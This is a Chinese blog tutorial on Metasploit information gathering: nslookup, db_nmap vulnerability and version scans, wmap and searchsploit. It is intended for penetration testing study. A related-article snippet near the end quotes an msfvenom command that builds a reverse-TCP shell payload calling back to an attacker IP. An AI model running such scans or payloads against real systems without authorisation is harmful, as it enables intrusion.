MSF的辅助扫描模块(信息搜集)

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: 信息搜集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/102492281
版权

nslookup工具

这个工具kali和windows都可以直接使用,此工具分为两种模式

1、非交互模式

  •     nslookup –qt=类型 目标域名    (默认查询类型是a 地址记录IPV4
  •     nslookup -qt=类型 目标域名 指定的DNS服务器IP或域名

2、交互模式

    nslookup 【Enter】    进入交互行模式

    set qt=类型                设定查询类型,默认设置为a

    IP或域名               

    set qt=有一个类型       切换查询类型      

    help or ?                    查看帮助

    exit                             退出nslookup交互模式

如上IP存在差异,毕竟有CDN

MSF的db_nmap扫描模块

扫描模块的作用就是帮助我们进行信息收集

  • -sU:UDP扫描
  • -sT:TCP扫描
  • -sV:扫描系统版本和程序版本检测
  • -n:禁止反向域名解析
  • -R:反向域名解析
  • -6:启用IPV6扫描
  • --scrpt=vuln:全面的漏洞扫描

漏洞扫描

命令:使用vuln脚本进行全面的漏洞扫描

db_nmap --script=vuln 192.168.1.123

 指纹识别扫描

命令:扫描系统和程序版本号检测,并且输出详细信息

db_nmap -sV -v 192.168.1.123

自动化扫描插件

wmap

使用命令:

  • msf>load wmap               加载插件
  • msf>wmap_sites -a url         添加目标
  • msf>wmap_targets -t url      添加目标URL地址
  • msf>wmap_run -e                 测试目标
  • msf>wmap_vulns                  查看漏洞详细信息

运行效果如下

漏洞库 - searchsploit

kali 中的离线漏洞库

离线漏洞数据库帮助我们在测试时候找到对方的POC或者是利用脚本

手册:https://www.exploit-db.com/searchsploit

 

秋水sir
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf搜索漏洞模块MSF模块查找
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 920
MSF内置强大的端口扫描工具Nmap,msf搜索漏洞模块,内置命令为:db_nmap。并且会自动存储nmap扫描结果到数据库中,方便快速查询已知存活主机,以及更快捷的进行团队协同作战,使用方法与nmap一致。 1、msf搜索漏洞模块启动与帮助 MSF在Kali Linux中其实已经自动安装好了,就在漏洞利用工具集下,如下所示看划线部分:
msf autopwn
06-23
6. **后渗透操作**:一旦攻击成功,msf autopwn 可能会执行一些后渗透任务,如收集系统信息、安装后门、横向移动等,这些都是渗透测试的重要组成部分。 7. **db_autopwn.rb**:这个文件名可能表示一个 Ruby 脚本,...
MSF(四):常用弱点扫描模块
1stPeak's Blog
02-21 1079
MSF(四):常用弱点扫描模块 安全牛学习Metasploit Framework笔记
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
最新发布
XLbb的博客
05-08 2017
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
kail里面的msf怎么寻找优秀模块
weixin_45441727的博客
09-29 281
kai linux msf里面怎么找到优秀模块 search rank:excellent
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 2977
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
利用msf发现缺失的补丁
技术超强的网络安全平台
09-12 330
利用msf发现缺失的补丁 use post/windows/gather/enum_patches
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
6. **有效负载与payloads**:Metasploit中的payloads是利用成功后的后续代码,可以实现诸如控制系统、收集信息、隐藏踪迹等功能。选择合适的payload是成功渗透的关键步骤。 7. **模块系统**:Metasploit包含大量的...
第二十六课:基于MSF发现内网存活主机第四季1
08-03
本课程分为四季,分别介绍了Metasploit Framework(MSF)中的不同扫描模块,用于辅助检测网络中的活动主机。MSF是一个广泛使用的开源渗透测试工具,它包含了各种扫描器、利用模块、后渗透工具等,为安全专家提供了...
metasploit 教程
09-04
7. **运行辅助模块**:利用auxiliary模块进行信息收集、扫描等前置工作,增强攻击成功率。 8. **生成payload**:当需要定制化的payload时,可以使用Metasploit的payload生成器。 9. **使用高级功能**:深入探索如...
msploitego:基于Metasploit数据库中数据的Maltego渗透测试套件
05-11
一个bash脚本,针对目标运行大量辅助模块。 真的“胖”了Metasploit数据库 转换: 枚举Metasploit工作区 Nikto Parser [来自文件] 文件中的Enum4linux paser DNS扫描 错误修复 基于Nmap的变换返回假阴性 坏路 ...
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 556
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
SearchSploit漏洞查找工具使用指南
大方子
10-04 7576
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4805
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
MSF之漏洞复现
mackilo的博客
11-08 8386
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息
2021Kali系列 -- 漏洞检测(wmap/db_nmap)
weixin_41489908的博客
04-20 2428
我反感任何人以一种开玩笑的语气说着我最在意的事。。。 ---- 网易云热评 一、wmap模块 0、启动并连接数据库 service postgresql start 1、加载插件 load wmap 2、添加站点 wmap_sites -a http://192.168.139.132 3、列出站点可用的目标 wmap_sites -l 4、添加目标 wmap_targets -t http://192.168.139.132 5、测试目标 wmap...
Metasploit-域名上线隐藏IP
懂进攻知防守
08-04 737
为什么要隐藏IP?在拿下了目标机之后,目标机在内网里面,使用msf或者CS时,用自己的VPS做服务器的话,导致很容易被溯源。
使用Shell编写在exploit-db中下载漏洞利用脚本程序
m0_47555956的博客
09-20 1516
使用Shell编写在exploit-db中下载漏洞利用脚本程序
MSF工具中调用MS15034HTTP.SYS漏洞的辅助扫描模块,将调用此模块的命令作为Flag值提交命令
05-30
MSF工具中,可以使用`auxiliary/scanner/http/ms15_034_http_sys_memory_dump`模块进行MS15-034漏洞的辅助扫描,该模块可以检测目标系统是否存在MS15-034漏洞,并且可以执行内存转储操作以便进行后续的漏洞利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值